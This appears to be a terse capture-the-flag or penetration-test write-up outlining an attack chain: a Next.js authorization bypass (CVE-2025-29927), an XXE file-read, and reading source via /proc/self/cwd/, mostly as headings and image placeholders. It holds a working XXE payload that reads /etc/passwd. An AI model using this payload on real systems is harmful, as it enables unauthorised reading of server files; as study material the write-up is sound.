1. Authorization bypass via CVE-2025-29927 in Next.js

image.png

image.png

image.png

image.png

2. Arbitrary File Read Vulnerability via XML external entity (XXE) injection

image.png

image.png

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>

image.png

3. Use /proc/self/cwd/ to read current source path